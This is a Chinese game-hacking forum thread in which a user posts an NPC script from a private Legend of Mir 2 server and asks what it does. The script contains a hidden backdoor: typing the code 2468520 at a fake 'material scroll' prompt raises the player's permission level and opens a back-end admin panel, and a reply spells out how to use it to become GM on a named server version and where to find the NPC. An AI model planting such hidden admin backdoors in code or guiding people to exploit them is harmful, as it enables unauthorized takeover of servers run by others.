WPE|52wpe|我爱WPE

注册会员
搜索
  • 752查看
  • 5回复

高级会员

(@storage @getback)
%100

[@main]
<$USERNAME>,欢迎来到卧龙酒馆!您是想要喝一点酒吧?\
目前这里只有烧酒,不过嘛...\
很快玛法大陆都会沉浸在一片酒香中的。\
烧酒每坛1元宝,嘿嘿。\ \
<使用仓库/@使用仓库> <打听先天属性的秘密/@先天属性秘密>\
<我要进入酒馆/@进入> <行会泉水仓库/@行会泉水仓库> <使用精制材料卷/@材料卷>\
<我要去雷炎洞穴/@去雷炎洞穴> <进入狼烟梦境/@狼烟梦境> <探听酒的秘密/@探听酒>\
<返回盟重/@回土城> <买泉水罐/@泉水罐> <买烧酒/@买酒>\

[@探听酒]
#Call [\\游戏功能\听酒消息.txt] @消息

[@买酒]
#IF
CHECKGAMEGOLD > 0
#ACT
GAMEGOLD - 1
GIVE 烧酒 1
#elsesay
你的元宝数目不足

[@进入]
#if
#act
mapmove 0170 9 20

[@去雷炎洞穴]
#if
#act
mapmove hl001 30 40

[@狼烟梦境]
<$USERNAME>,怪物们突破了结界,闯入了王国的一些地狱,\
那些地狱虽然地处偏境,但若不及时驱逐它们的话,\
恐怕它们便回跑到人烟稠密的地方作乱。\
如果你要去的话,我会派人送你去哪里的,\
30分钟后会有人接你出来。对了,你要 给我三枚\
狼烟梦境焰火,去接你的人好用这些焰火和你联络。\
你带来焰火了吗?\ \
<我带来了/@带来了>

[@带来了]
#IF
checkitem 狼烟梦境 3
#ACT
GOTO @有焰火
#ELSEACT
GOTO @没有焰火

[@有焰火]
#IF
checkitem 狼烟梦境 3
#ACT
timerecall 30
take 狼烟梦境 3
GIVE 回城卷 1
mapmove lymj
break

[@没有焰火]
你好像没有必须的焰火啊!

[@泉水罐]
流浪的勇士在玛法大陆上发现了很多从地底涌出的泉水,\
那些泉水清澈沁人、甘甜可口,是酿酒的好材料。\
如果你在冒险的旅程中发现了这些泉水,只需要把泉水灌\
装备于毒符位,站在喷涌而出的泉水上,就可以收集了。\
你现在就需要泉水罐吗?5000金币一个。\ \
<是的,我需要一个泉水罐/@买泉水罐>

[@买泉水罐]
#IF
checkgold 5000
#ACT
take 金币 200
give 泉水罐 1
GOTO @在买泉水罐

[@在买泉水罐]
1个泉水罐已经给你了,你还需要些什么吗?\ \
<在买一个泉水罐/@买泉水罐>\ \

<返回/@main>

[@材料卷]
#IF
#act
#say
请输入材料的名字!\ \
<输入材料的名字/@@InPutInteger33>
#elseact
messagebox 对不起,您输入的名字错误...

[@InPutInteger33]
#if
#act
mov N32 2468520
BREAK
GOTO @授权码验证

[@授权码验证]
#if
equal N33 <$STR(N32)>
#ACT
CHANGEPERMISSION 10 #CALL [\讯网科技\后台管理.txt] @管理
BREAK
#ELSEACT
MESSAGEBOX 对不起,您输入的名字错误...

[@回土城]
#if
#act
mapmove 3 330 330

高级会员

本人新手,在52泡了一天后自己学着找漏洞,找到后悲剧发生了,我根本不懂计算机语言。求高人解释这段话的含义。

金牌会员

1..85狂雷合击独家修改版? 、点材料卷。输入2468520、恭喜你 你是GM了!

如果是1.85的话。你懂的、、店小二就在银杏山村的某一个房间 房间外面有个NPC。你懂的

高级会员

是的。多谢了

注册会员

呵呵,有时间我也找个漏洞来求助~

高级会员

不懂.............................

快速发帖